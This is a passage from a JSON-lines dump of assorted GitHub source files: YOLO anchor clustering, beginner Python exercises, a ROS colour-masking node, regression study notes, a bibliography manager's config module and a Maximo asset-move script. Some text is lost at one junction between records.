\"\"\"\n # sort the k-means anchors k by area from small to large\n k = k[np.argsort(k.prod(1))] # sort small to large\n # x: [N, 9] width or height ratio (smaller of the two) of the N gt boxes against all anchors\n # best: [N] the largest of those ratios (smaller of the two) for each of the N gt boxes over all anchors\n x, best = metric(k, wh0)\n # (best > thr).float(): True=>1. False->0. .mean(): take the mean\n # bpr (best possible recall): gt boxes recallable (passing thr) / all gt boxes [1] 0.96223; k-means recomputes anchors only below 0.98\n # aat (anchors above threshold): [1] 3.54360 how many anchors each target has on average\n bpr, aat = (best > thr).float().mean(), (x > thr).float().mean() * n # best possible recall, anch > thr\n s = f'{PREFIX}thr={thr:.2f}: {bpr:.4f} best possible recall, {aat:.2f} anchors past thr\\n' \\\n f'{PREFIX}n={n}, img_size={img_size}, metric_all={x.mean():.3f}/{best.mean():.3f}-mean/best, ' \\\n f'past_thr={x[x > thr].mean():.3f}-mean: '\n for x in k:\n s += '%i,%i, ' % (round(x[0]), round(x[1]))\n if verbose:\n LOGGER.info(s[:-2])\n return k\n\n if isinstance(dataset, str): # *.yaml file\n with open(dataset, errors='ignore') as f:\n data_dict = yaml.safe_load(f) # model dict\n from utils.dataloaders import LoadImagesAndLabels\n dataset = LoadImagesAndLabels(data_dict['train'], augment=True, rect=True)\n\n # get the wh of every sample in the dataset\n # scale the longest side of each dataset image to img_size, the shorter side accordingly\n shapes = img_size * dataset.shapes / dataset.shapes.max(1, keepdims=True)\n # scale the dataset's normalized gt-box wh up to the shapes scale\n wh0 = np.concatenate([l[:, 3:5] * s for s, l in zip(shapes, dataset.labels)]) # wh\n\n # count gt boxes whose width or height is below 3 pixels; targets that small trigger a warning\n i = (wh0 < 3.0).any(1).sum()\n if i:\n LOGGER.info(f'{PREFIX}WARNING ⚠️ Extremely small objects found: {i} of {len(wh0)} labels are <3 pixels in size')\n # keep only labels larger than 2 pixels for clustering; the [...] acts as a filter keeping the True entries\n wh = wh0[(wh0 >= 2.0).any(1)].astype(np.float32) # filter > 2 pixels\n # wh = wh * (npr.rand(wh.shape[0], 1) * 0.9 + 0.1) # multiply by random scale 0-1\n\n # k-means clustering: uses Euclidean distance\n try:\n LOGGER.info(f'{PREFIX}Running kmeans for {n} anchors on {len(wh)} points...')\n # compute the standard deviation of width and height -> [w_std,h_std]\n assert n <= len(wh) # apply overdetermined constraint\n s = wh.std(0) # sigmas for whitening\n # start clustering, still into n clusters; returns the clustered anchors k (this anchor k is for the whitened data)\n # also note that the kmeans here computes with Euclidean distance\n # k-means runs 30 iterations; obs: the input data must be whitened first ('whiten operation')\n # whitening: the new data has std=1, lowering correlation between features; less redundancy between the information they carry makes network training more efficient\n # blog on whitening: https://blog.csdn.net/weixin_37872766/article/details/102957235\n k = kmeans(wh / s, n, iter=30)[0] * s # points\n assert n == len(k) # kmeans may return fewer points than requested if wh is insufficient or too similar\n except Exception:\n 
LOGGER.warning(f'{PREFIX}WARNING ⚠️ switching strategies from kmeans to random init')\n k = np.sort(npr.rand(n * 2)).reshape(n, 2) * img_size # random init\n wh, wh0 = (torch.tensor(x, dtype=torch.float32) for x in (wh, wh0))\n k = print_results(k, verbose=False)\n\n # Plot\n # k, d = [None] * 20, [None] * 20\n # for i in tqdm(range(1, 21)):\n # k[i-1], d[i-1] = kmeans(wh / s, i) # points, mean distance\n # fig, ax = plt.subplots(1, 2, figsize=(14, 7), tight_layout=True)\n # ax = ax.ravel()\n # ax[0].plot(np.arange(1, 21), np.array(d) ** 2, marker='.')\n # fig, ax = plt.subplots(1, 2, figsize=(14, 7)) # plot wh\n # ax[0].hist(wh[wh[:, 0]<100, 0],400)\n # ax[1].hist(wh[wh[:, 1]<100, 1],400)\n # fig.savefig('wh.png', dpi=200)\n\n # Evolve: genetic/evolutionary-style mutation step\n # f: fitness 0.62690\n # sh: (9,2)\n # mp: mutation prob=0.9 s: sigma=0.1\n f, sh, mp, s = anchor_fitness(k), k.shape, 0.9, 0.1 # fitness, generations, mutation prob, sigma\n pbar = tqdm(range(gen), bar_format=TQDM_BAR_FORMAT) # progress bar\n for _ in pbar:\n # repeat mutation+selection 1000 times and keep the best anchor k and best fitness f seen across those mutations\n v = np.ones(sh)\n while (v == 1).all(): # mutate until a change occurs (prevent duplicates)\n # produce the mutation rule: mutate until a change occurs (prevent duplicates)\n # npr.random(sh) < mp: mutate v with 90% probability; entries picked for mutation become 1, the rest 0\n v = ((npr.random(sh) < mp) * random.random() * npr.randn(*sh) * s + 1).clip(0.3, 3.0)\n kg = (k.copy() * v).clip(min=2.0)\n # compute the fitness of the mutated anchor kg\n fg = anchor_fitness(kg)\n # if the fitness of the mutated anchor kg > the best fitness so far, perform selection\n if fg > f:\n # select the mutated anchor kg as the best anchor k and its fitness fg as the best fitness f\n f, k = fg, kg.copy()\n\n # print progress\n pbar.desc = f'{PREFIX}Evolving anchors with Genetic Algorithm: fitness = {f:.4f}'\n if verbose:\n print_results(k, verbose)\n\n return print_results(k).astype(np.float32)\n","repo_name":"yblir/yolov5_origin_comment","sub_path":"utils/autoanchor.py","file_name":"autoanchor.py","file_ext":"py","file_size_in_byte":16003,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"556829396","text":"def cria_matriz(L, C):\n M = []\n linha = C * [0]\n for i in range(L):\n M.append(linha[:])\n return M\ndef preenche_matriz(M, L, C):\n for i in range(L):\n for j in range(C):\n M[i][j] = float(input())\nM = cria_matriz(12,12)\nL = int(input())\nT = input()\npreenche_matriz(M, 12, 12)\nif T == 'S':\n resultado = sum(M[L])\nelse:\n resultado = sum(M[L]) / 12\nprint(f'{resultado:.1f}')\n","repo_name":"ViniciusAlbanit/python_exercicios","sub_path":"exercicios/matriz.py","file_name":"matriz.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"33528428351","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n# Exercise 4\n# Code for the students\n\n\ndef tablaMultiplicar(n):\n for i in range(11):\n print(n,\"x\",i,\"=\",n*i)\n \n\ndef maximoComunDivisor(n1,n2):\n mayor = max(n1, n2)\n menor = min(n1, n2)\n if menor == 0:\n menor = mayor\n else:\n r = mayor % menor\n while r != 0:\n mayor = menor\n menor = r\n r = mayor % menor\n print(menor)\n return menor\n\ndef minimoComunMultiplo(n1,n2):\n menor = min(n1,n2)\n mcd = 1\n for i in range(1,menor+1):\n if (n1%i==0 and n2%i==0):\n mcd = i\n mcm = (n1*n2)/mcd\n print(mcm)\n return mcm\n\n","repo_name":"JoseAntonioVelasco/2DAM_Workspaces","sub_path":"Python/ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
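The ejercicio4 record above computes the GCD with Euclid's algorithm and derives the LCM from it. A compact reference version of the same pair, assuming non-negative integers (the helper names here are illustrative, not the exercise's own code):

```python
# Euclid's algorithm, then lcm(a, b) = a * b // gcd(a, b).
# Reference sketch for the exercise above; assumes non-negative integers.
def gcd(a, b):
    while b:
        a, b = b, a % b
    return a

def lcm(a, b):
    # lcm of 0 with anything is 0; avoid dividing by gcd(0, 0) == 0
    return a * b // gcd(a, b) if a and b else 0

assert gcd(12, 8) == 4 and lcm(12, 8) == 24
```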
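Further up, the yolov5 autoanchor record walks through k-means clustering followed by a genetic mutate-and-select loop. As a minimal, NumPy-only sketch of that evolution step on hypothetical toy data (the fitness function, mutation constants, and inputs below are illustrative assumptions, not the record's own code):

```python
import numpy as np

rng = np.random.default_rng(0)

def anchor_fitness(k, wh, thr=1 / 4.0):
    # ratio metric as in the record: per gt box and anchor, take the worse of
    # the width and height ratios, folded so the value is always <= 1
    r = wh[:, None] / k[None]            # [N, n, 2]
    x = np.minimum(r, 1 / r).min(2)      # [N, n]
    best = x.max(1)                      # [N] best anchor per gt box
    return (best * (best > thr)).mean()  # boxes below thr contribute nothing

def evolve(k, wh, gen=300, mp=0.9, sigma=0.1):
    f = anchor_fitness(k, wh)
    for _ in range(gen):
        v = np.ones(k.shape)
        while (v == 1).all():            # mutate until a change occurs
            v = ((rng.random(k.shape) < mp) * rng.random()
                 * rng.standard_normal(k.shape) * sigma + 1).clip(0.3, 3.0)
        kg = (k * v).clip(min=2.0)       # mutated candidate anchors
        fg = anchor_fitness(kg, wh)
        if fg > f:                       # selection: keep improvements only
            f, k = fg, kg
    return k, f

wh = rng.uniform(8, 256, size=(500, 2))  # stand-in gt box widths/heights
k0 = rng.uniform(8, 256, size=(9, 2))    # random initial anchors
k, f = evolve(k0, wh)
print(f"evolved fitness: {f:.4f}")
```

Because a mutated candidate replaces the current anchors only when its fitness improves, the loop can never regress, mirroring the `if fg > f` selection in the record.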
+{"seq_id":"29453734759","text":"import random\ndef ocultar_letras(palabra, cantidad):\n h=0\n while hHello World my Babald

\"This

One more time

\"\"\"\n\n self.assertEqual(mixed_img_order_html,\n markdown.markdown(mixed_img_order_mdx,\n extensions=[PictureExtension()]))\n self.assertEqual(mixed_img_order_html,\n markdown.markdown(mixed_size_order_mdx,\n extensions=[PictureExtension()]))\n","repo_name":"speechkey/mdx_picture","sub_path":"mdx_picture/tests/test_block_elem_order.py","file_name":"test_block_elem_order.py","file_ext":"py","file_size_in_byte":1503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75289303929","text":"#!/usr/bin/env python\r\nfrom __future__ import print_function\r\n\r\nimport roslib\r\nroslib.load_manifest('cvtest')\r\nimport sys\r\nimport rospy\r\nimport numpy as np\r\nimport cv2\r\nfrom std_msgs.msg import String\r\nfrom sensor_msgs.msg import Image\r\nfrom cv_bridge import CvBridge, CvBridgeError\r\n\r\nclass image_converter:\r\n\r\n def __init__(self):\r\n self.image_pub = rospy.Publisher(\"image_topic_2\",Image,queue_size=10)\r\n\r\n self.bridge = CvBridge()\r\n self.image_sub = rospy.Subscriber(\"/video_source/raw\",Image,self.callback)\r\n\r\n def callback(self,data):\r\n try:\r\n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\r\n \r\n #img_gray = cv2.cvtColor(cv_image, cv2.COLOR_BGR2GRAY)\r\n cv_image_blur = cv2.GaussianBlur(cv_image,(5,5),0) #Aplicando un blur a la imagen \r\n \r\n hsv = cv2.cvtColor(cv_image, cv2.COLOR_BGR2HSV)\r\n \r\n redBajo1 = np.array([0, 100, 20], np.uint8)\r\n redAlto1 = np.array([8, 255, 255], np.uint8)\r\n redBajo2=np.array([175, 100, 20], np.uint8)\r\n redAlto2=np.array([179, 255, 255], np.uint8)\r\n \r\n lower_green = np.array([35, 30, 110])\r\n upper_green = np.array([60, 255, 255])\r\n \r\n maskRed1 = cv2.inRange(hsv, redBajo1, redAlto1)\r\n maskRed2 = cv2.inRange(hsv, redBajo2, redAlto2)\r\n maskRed = cv2.add(maskRed1, maskRed2)\r\n \r\n mask_green = cv2.inRange(hsv, lower_green, upper_green)\r\n \r\n res_green = cv2.bitwise_and(cv_image,cv_image, mask= mask_green)\r\n res_red = cv2.bitwise_and(cv_image,cv_image, mask= mask_Red)\r\n \r\n \r\n except CvBridgeError as e:\r\n print(e)\r\n\r\n (rows,cols,channels) = cv_image.shape\r\n if cols > 60 and rows > 60 :\r\n cv2.circle(cv_image, (50,50), 10, 255)\r\n\r\n cv2.imshow(\"Image window green\", res_green)\r\n cv2.imshow(\"Image window red\", res_red)\r\n cv2.waitKey(3)\r\n\r\n try:\r\n self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, \"bgr8\"))\r\n \r\n except CvBridgeError as e:\r\n print(e)\r\n\r\ndef main(args):\r\n ic = image_converter()\r\n rospy.init_node('image_converter', anonymous=True)\r\n try:\r\n rospy.spin()\r\n except KeyboardInterrupt:\r\n print(\"Shutting down\")\r\n cv2.destroyAllWindows()\r\n\r\nif __name__ == '__main__':\r\n main(sys.argv)","repo_name":"jorge-vh/puzzlebot","sub_path":"src/cvtest/src/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31292696651","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\n@author = 'wyx'\n@time = 2018/5/11 15:08\n@annotation = ''\n\"\"\"\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom sklearn.linear_model import SGDRegressor, LinearRegression\n\nimport util\n\nX = 2 * np.random.rand(100, 1)\ny = 4 + 3 * X + np.random.randn(100, 1)\n# add x0 = 1 to each instance\nX_b = np.c_[np.ones((100, 1)), X]\nX_new = np.array([[0], [2]])\nif False:\n \"\"\"\n Use theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y) 直接\n when the 
number of features grows large The Normal Equation gets very slow\n    \"\"\"\n\n    # X_b = X\n    theta_best = np.linalg.inv(X_b.T.dot(X_b)).dot(X_b.T).dot(y)\n    print(theta_best)\n\n    # X_new_b = X_new\n    X_new_b = np.c_[np.ones((2, 1)), X_new]  # add x0 = 1 to each instance\n    y_predict = X_new_b.dot(theta_best)\n    print(y_predict)\n\n    plt.plot(X_new, y_predict, \"r-\")\n    plt.plot(X, y, \"b.\")\n    plt.axis([0, 2, 0, 15])\n    plt.show()\nif False:\n    lin_reg = LinearRegression()\n    lin_reg.fit(X, y)\n    print(lin_reg.intercept_, lin_reg.coef_)\n    print(lin_reg.predict(X_new))\nif False:\n    \"\"\"\n    Batch Gradient Descent\n    \n    it uses the whole training set to compute the gradient at every step, which makes it very slow when the training set is large\n    \"\"\"\n    eta = 0.1  # learning rate\n    n_iterations = 1000\n    m_instance_num = 100\n    theta = np.random.randn(2, 1)  # random initialization\n    for iteration in range(n_iterations):\n        gradients = 2 / m_instance_num * X_b.T.dot(X_b.dot(theta) - y)\n        theta = theta - eta * gradients\n\n    print(theta)\nif False:\n    \"\"\"\n    Stochastic Gradient Descent\n    stochastic gradient descent just picks a random instance from the training set at each step and computes the gradient from that single instance only\n    because of this randomness the cost function bounces up and down instead of decreasing steadily like batch GD, going down only on average; over time\n    it ends up very close to the minimum, but once it gets there it keeps bouncing around and never settles down.\n    so once the algorithm stops, the final parameter values are good, but not optimal\n    \n    \n    when the cost function is very irregular this can actually help the algorithm jump out of local minima,\n    so the randomness is good for escaping local optima, but bad because it means the algorithm can never truly settle at the minimum\n    \n    the remedy is to\n    gradually reduce the learning rate. the steps start out large (which helps make quick progress and escape local minima),\n    then get smaller and smaller, letting the algorithm settle at the global minimum. (simulated annealing)\n    \"\"\"\n    n_epochs = 50\n    t0, t1 = 5, 50  # learning schedule hyperparameters\n\n\n    def learning_schedule(t):\n        return t0 / (t + t1)\n\n\n    theta = np.random.randn(2, 1)  # random initialization\n    for epoch in range(n_epochs):\n        for i in range(m_instance_num):\n            random_index = np.random.randint(m_instance_num)\n            xi = X_b[random_index:random_index + 1]\n            yi = y[random_index:random_index + 1]\n            gradients = 2 * xi.T.dot(xi.dot(theta) - yi)\n            eta = learning_schedule(epoch * m_instance_num + i)\n            theta = theta - eta * gradients\n    print(theta)\n    \"\"\"\n    Mini-batch Gradient Descent\n    computes the gradient on small random sets of instances (mini-batches)\n\n    progress is less erratic than SGD, especially with fairly large mini-batches.\n    so mini-batch GD ends up walking closer to the minimum than SGD, but on the other hand it may find it harder to escape local minima\n    \"\"\"\n\nif False:\n    sgd_reg = SGDRegressor(max_iter=50, penalty=None, eta0=0.1)\n    sgd_reg.fit(X, y.ravel())\n    print(sgd_reg.intercept_, sgd_reg.coef_)\n    util.plot_learning_curves(sgd_reg, X, y.ravel())\n\nif False:\n    \"\"\"\n    Polynomial Regression\n    \n    y = ax^2 + bx + c\n    \n    two features a and b, PolynomialFeatures with degree=3 would not only add the features a^2, a^3, b^2, and b^3, \n    but also the combinations ab, a^2b, and ab^2.\n    \"\"\"\n    m = 100\n    X = 6 * np.random.rand(m, 1) - 3\n    y = 0.5 * X ** 2 + X + 2 + np.random.randn(m, 1)\n\n    from sklearn.preprocessing import PolynomialFeatures\n\n    poly_features = PolynomialFeatures(degree=2, include_bias=False)\n    X_poly = poly_features.fit_transform(X)\n    lin_reg = LinearRegression()\n    lin_reg.fit(X_poly, y)\n    print(lin_reg.intercept_, lin_reg.coef_)\n    coef = lin_reg.coef_[0]\n    print(str(coef[1]) + ' X^2 + ' + str(coef[0]) + 'X + ' + str(lin_reg.intercept_[0]))\n\n    from sklearn.pipeline import Pipeline\n\n    polynomial_regression = Pipeline((\n        (\"poly_features\", PolynomialFeatures(degree=10, include_bias=False)),\n        (\"sgd_reg\", LinearRegression()),\n    ))\n    util.plot_learning_curves(polynomial_regression, X, y)\n\nif False:\n    \"\"\"\n    Ridge Regression \n    the hyperparameter α controls how much you want to regularize the model.\n    if α = 0, Ridge Regression is just Linear Regression.\n    if α is very large, all weights end up very close to zero\n    \n    scaling the data matters a lot for regularized models\n    \"\"\"\n    from sklearn.linear_model import Ridge\n\n    # Alternatively you can use the Ridge class with the \"sag\" solver. 
Stochastic Average GD is a variant of SGD.\n    # Scikit-Learn using a closed-form solution (a variant of Equation 4-9 using a matrix factorization technique by André-Louis Cholesky):\n    # ridge_reg = Ridge(alpha=1, solver=\"cholesky\")\n    ridge_reg = Ridge(alpha=1, solver=\"saga\")\n    ridge_reg.fit(X, y)\n    print(ridge_reg.predict([[1.5]]))\n    util.plot_learning_curves(ridge_reg, X, y)\n\n    sgd_reg = SGDRegressor(penalty=\"l2\")\n    sgd_reg.fit(X, y.ravel())\n    print(sgd_reg.predict([[1.5]]))\n    util.plot_learning_curves(sgd_reg, X, y.ravel())\n\nif False:\n    \"\"\"\n    Lasso Regression\n    drives weights all the way to zero\n    \"\"\"\n    from sklearn.linear_model import Lasso\n\n    lasso_reg = Lasso(alpha=0.1)\n    lasso_reg.fit(X, y)\n    print(lasso_reg.predict([[1.5]]))\n    util.plot_learning_curves(lasso_reg, X, y)\n\n    sgd_reg = SGDRegressor(penalty=\"l1\")\n    sgd_reg.fit(X, y.ravel())\n    print(sgd_reg.predict([[1.5]]))\n    util.plot_learning_curves(sgd_reg, X, y.ravel())\n\nif False:\n    \"\"\"\n    When r = 0, Elastic Net is equivalent to Ridge Regression\n    when r = 1, it is equivalent to Lasso Regression\n    l1_ratio = r\n    \n    Ridge is a good default \n    Elastic Net is usually preferred over Lasso \n    \n    Lasso can behave erratically when\n    feature number > instance number \n    or several features are strongly correlated\n    \"\"\"\n    from sklearn.linear_model import ElasticNet\n\n    elastic_net = ElasticNet(alpha=0.1, l1_ratio=0.5)\n    elastic_net.fit(X, y)\n    print(elastic_net.predict([[1.5]]))\n    util.plot_learning_curves(elastic_net, X, y)\n","repo_name":"631068264/learn-sktf","sub_path":"sk/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":6559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30337846246","text":"# -*- coding: utf-8 -*-\n# B - Chocolate\n# https://atcoder.jp/contests/abc092/tasks/abc092_b\n\nn = int(input())\nd, x = map(int, input().split())\na = [int(input()) for _ in range(n)]\nchoco = [0] * n\n\nfor i in range(n):\n    count = d\n    while count > 0:\n        count -= a[i]\n        choco[i] += 1\n\nans = sum(choco) + x\nprint(ans)\n\n# 20:05 - 20:24\n","repo_name":"yu5shi8/AtCoder","sub_path":"ABC_B/ABC092B.py","file_name":"ABC092B.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"2251437890","text":"import json\nimport os\nimport sys\nfrom dataclasses import dataclass\nfrom lib2to3.pgen2 import token\nfrom types import TracebackType\nfrom typing import Any, Dict, List\n\nimport yaml\nfrom beet import Context, Function, run_beet\nfrom mecha import (CompilationError, CompilationUnit, DiagnosticError,\n                   DiagnosticErrorSummary, Mecha, Parser)\nfrom TokenHighlighter import TokenHighlighter\nfrom tokenstream import TokenStream\n\n\n@dataclass\nclass TokenExtractor:\n    parser: Parser\n    ctx: Context\n\n    def __call__(self, stream: TokenStream) -> Any:\n        node = self.parser(stream)\n        tokens = []\n        for t in stream.tokens:\n            tokens.append({'type': t.type, 'value': t.value, 'start': 
backup_files=False):\n self.file = file\n self.local = local\n self.data = data\n self.filesdir = filesdir\n self.editor = editor\n self.bibtex = bibtex\n self.keyformat = keyformat\n self.nameformat = nameformat\n if absolute_paths is None:\n absolute_paths = False if local else True\n self.absolute_paths = absolute_paths\n self.gitdir = gitdir or data\n self.git = git\n self.gitlfs = gitlfs\n self.backup_files = backup_files\n\n\n @property\n def editor(self):\n return self._editor\n\n @editor.setter\n def editor(self, value):\n if value is not None:\n os.environ['EDITOR'] = value\n self._editor = value\n\n def collections(self):\n files = []\n for root, dirs, files in os.walk(os.path.dirname(self.bibtex)):\n break\n # return sorted(f[:-4] for f in files if f.endswith('.bib'))\n return sorted(f for f in files if f.endswith('.bib'))\n\n @property\n def root(self):\n if self.local and self.bibtex:\n return Path(self.bibtex).parent.resolve()\n else:\n return Path(os.path.sep)\n\n def gitcmd(self, cmd, check=True, **kw):\n return (sp.check_call if check else sp.call)(f\"git {cmd}\", shell=True, cwd=self.gitdir, **kw)\n\n\n def _relpath(self, p):\n if p is None: return p\n if not self.local:\n return str(Path(p).resolve()) # abspath\n\n # otherwise express path relative to bibtex (parent of config file)\n try:\n # logger.info(f\"rel path: (p)\", p)\n return str((self.root / p).relative_to(self.root))\n except Exception as error:\n print(error)\n logger.warn(f\"config :: can't save {p} as relative path to {self.root}\")\n return p\n\n def _abspath(self, p, root=None):\n if p is None: return p\n if not self.local:\n return str(Path(p).resolve()) # abspath\n p2 = str((Path(root).resolve() if root is not None else self.root) / p)\n return p2\n\n\n def save(self):\n json.dump({\n \"filesdir\": self._relpath(self.filesdir),\n \"bibtex\": self._relpath(self.bibtex),\n \"gitdir\": self._relpath(self.gitdir),\n \"editor\": self.editor,\n \"keyformat\": self.keyformat.todict(),\n \"nameformat\": self.nameformat.todict(),\n \"local\": self.local,\n \"absolute_paths\": self.absolute_paths,\n \"git\": self.git,\n \"gitlfs\": self.gitlfs,\n \"backup_files\": self.backup_files,\n }, open(self.file, 'w'), sort_keys=True, indent=2, separators=(',', ': '))\n\n\n @classmethod\n def load(cls, file):\n js = json.load(open(file))\n if 'nameformat' in js:\n js['nameformat'] = Format(**js.get('nameformat'))\n if 'keyformat' in js:\n js['keyformat'] = Format(**js.get('keyformat'))\n cfg = cls(file=file, **js)\n cfg._update_paths_to_absolute()\n return cfg\n\n\n def _update_paths_to_absolute(self):\n if self.file is None:\n logger.warn(\"_update_paths_to_absolute: only works if Config.file is defined\")\n return\n root = Path(self.file).parent.parent\n for field in ['bibtex', 'filesdir', 'gitdir']:\n setattr(self, field, self._abspath(getattr(self, field), root))\n\n\n def status(self, check_files=False, verbose=False):\n\n def _fmt_path(p):\n if self.local:\n return os.path.relpath(p, \".\")\n else:\n return p\n\n lines = []\n if self.file and os.path.exists(self.file):\n status = \"(local)\" if self.local else \"(global)\"\n else:\n status = bcolors.WARNING+\"(default, not installed)\"+bcolors.ENDC\n lines.append(bcolors.BOLD+f'papers configuration {status}'+bcolors.ENDC)\n lines.append(bcolors.BOLD+f'version {__version__}'+bcolors.ENDC)\n if verbose:\n lines.append('* configuration file: '+(_fmt_path(self.file) if self.file and os.path.exists(self.file) else bcolors.WARNING+'none'+bcolors.ENDC))\n lines.append('* 
cache directory: '+CACHE_DIR)\n lines.append('* absolute paths: '+str(self.absolute_paths))\n # lines.append('* app data directory: '+self.data)\n lines.append('* git-tracked: '+str(self.git))\n if self.git:\n lines.append('* git-lfs tracked: '+str(self.gitlfs))\n lines.append('* git directory : '+self.gitdir)\n lines.append('* editor: '+str(self.editor))\n\n if self.filesdir is None:\n status = bcolors.WARNING+' (unset)'+bcolors.ENDC\n elif not os.path.exists(self.filesdir):\n status = bcolors.WARNING+' (missing)'+bcolors.ENDC\n elif not os.listdir(self.filesdir):\n status = bcolors.WARNING+' (empty)'+bcolors.ENDC\n elif check_files:\n file_count, folder_size = check_filesdir(self.filesdir)\n status = bcolors.OKBLUE+\" ({} files, {:.1f} MB)\".format(file_count, folder_size/(1024*1024.0))+bcolors.ENDC\n else:\n status = ''\n\n lines.append(f'* files directory: {_fmt_path(self.filesdir) if self.filesdir else self.filesdir}'+status)\n\n if self.bibtex is None:\n status = bcolors.WARNING+' (unset)'+bcolors.ENDC\n elif not os.path.exists(self.bibtex):\n status = bcolors.WARNING+' (missing)'+bcolors.ENDC\n elif check_files:\n try:\n bibtexstring = open(self.bibtex).read()\n db = bibtexparser.loads(bibtexstring)\n if len(db.entries):\n status = bcolors.OKBLUE+' ({} entries)'.format(len(db.entries))+bcolors.ENDC\n else:\n status = bcolors.WARNING+' (empty)'+bcolors.ENDC\n except:\n status = bcolors.FAIL+' (corrupted)'+bcolors.ENDC\n elif os.path.getsize(self.bibtex) == 0:\n status = bcolors.WARNING+' (empty)'+bcolors.ENDC\n else:\n status = ''\n lines.append(f'* bibtex: {_fmt_path(self.bibtex) if self.bibtex else self.bibtex}'+status)\n\n # if verbose:\n # collections = self.collections()\n # status = bcolors.WARNING+' none'+bcolors.ENDC if not collections else ''\n # lines.append('* other collections:'+status)\n # for i, nm in enumerate(collections):\n # if i > 10:\n # lines.append(' '+'({} more collections...)'.format(len(collections)-10))\n # break\n # status = ' (*)' if nm == self.collection else ''\n # lines.append(' '+nm+status)\n\n\n\n return '\\n'.join(lines)\n\n\ndef _init_cache():\n if not os.path.exists(CACHE_DIR):\n logger.info('make cache directory for DOI requests: '+CACHE_DIR)\n os.makedirs(CACHE_DIR)\n\n_init_cache()\n\ndef cached(file, hashed_key=False):\n\n file = os.path.join(CACHE_DIR, file)\n\n def decorator(fun):\n if os.path.exists(file):\n cache = json.load(open(file))\n else:\n cache = {}\n def decorated(doi):\n if hashed_key: # use hashed parameter as key (for full text query)\n key = hashlib.sha256(doi.encode('utf-8')).hexdigest()[:6]\n else:\n key = doi\n if key in cache:\n logger.debug('load from cache: '+repr((file, key)))\n return cache[key]\n else:\n res = cache[key] = fun(doi)\n if not DRYRUN:\n json.dump(cache, open(file,'w'))\n return res\n return decorated\n return decorator","repo_name":"perrette/papers","sub_path":"papers/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":9052,"program_lang":"python","lang":"en","doc_type":"code","stars":130,"dataset":"github-code","pt":"77"} +{"seq_id":"42725097187","text":"import numpy as np, re, math\r\n\r\nwith open('inputday7.txt') as f:\r\n input = f.readline()\r\n \r\ncrab_pos = np.array([int(i) for i in re.findall(r'\\d+', input)])\r\n\r\ndef fuel_cost(crab_pos, align):\r\n fuel = 0\r\n for i in range(len(crab_pos)):\r\n fuel = fuel + abs(crab_pos[i] - align)\r\n return fuel\r\n\r\ndef fuel_cost2(crab_pos, align):\r\n fuel = 0\r\n for i in range(len(crab_pos)):\r\n for j in range(abs(crab_pos[i] - 
align) + 1):\r\n            fuel = fuel + j\r\n    return fuel\r\n\r\n#PART 1\r\n\r\nalign = int(np.median(crab_pos))\r\n\r\nmin_fuel = fuel_cost(crab_pos, align)\r\n\r\nprint(min_fuel)\r\n\r\n#PART 2\r\n\r\nfuel_list = []\r\nfor i in range(np.amax(crab_pos)):\r\n    align = i\r\n    fuel_list.append(fuel_cost2(crab_pos, align))\r\n\r\nfuel_list = np.array(fuel_list)\r\nmin_fuel = np.amin(fuel_list)\r\n\r\nprint(min_fuel)\r\n","repo_name":"baitware/AdventofCode","sub_path":"2021/Day 7/Day7.py","file_name":"Day7.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9907535703","text":"# AUTOSCRIPT NAME: CG_MOVEASSET\n# CREATEDDATE: 2017-04-06 05:42:33\n# CREATEDBY: U03V\n# CHANGEDATE: 2017-04-18 06:36:30\n# CHANGEBY: U144\n# SCRIPTLANGUAGE: jython\n# STATUS: Draft\n\nfrom psdi.app.location import Location\nfrom psdi.app.location import LocationRemote\nfrom psdi.app.location import LocationSetRemote\nfrom psdi.mbo import SqlFormat\n\ndef setError():\n    global errorkey,errorgroup,params\n    errorkey='invalidStatusForThisMove'\n    errorgroup='asset'\nif interactive :\n    prevloc=mbo.getString(\"LOCATION\")\n    prevloc1=mbo.getMboValue(\"LOCATION\").getPreviousValue().asString()\n    if prevloc!=prevloc1:\n        loc=mbo.getMboSet(\"NEWLOCATION\").getMbo(0)\n        if loc is not None and mbo.getString(\"SITEID\") == \"MS\":\n            assetnum=mbo.getString(\"ASSETNUM\")\n            sqf = SqlFormat(\"location=:1 and siteid=:2\")\n            sqf.setObject(1, \"LOCATIONS\", \"LOCATION\", mbo.getMboValue(\"LOCATION\").getPreviousValue().asString())\n            sqf.setObject(2, \"LOCATIONS\", \"SITEID\", mbo.getString(\"SITEID\"))\n            fromLoc=mbo.getMboSet(\"$newlocation\", \"LOCATIONS\", sqf.format()).getMbo(0)\n            \n            fromlocation=fromLoc.getString(\"LOCATION\")\n\n            fromlocationtype=fromLoc.getString(\"TYPE\")\n            loclocation=loc.getString(\"LOCATION\")\n\n            loclocationtype1=loc.getString(\"TYPE\")\n            \n\n            sqlfmt = SqlFormat(\"siteid=:1 and fromlocationtype=:2 and tolocationtype=:3 and assetstatus=:4\")\n            sqlfmt.setObject(1, \"CG_ASSETMOVERESTRICTION\", \"SITEID\", mbo.getString(\"SITEID\"))\n            sqlfmt.setObject(2, \"CG_ASSETMOVERESTRICTION\", \"FROMLOCATIONTYPE\", fromLoc.getString(\"TYPE\"))\n            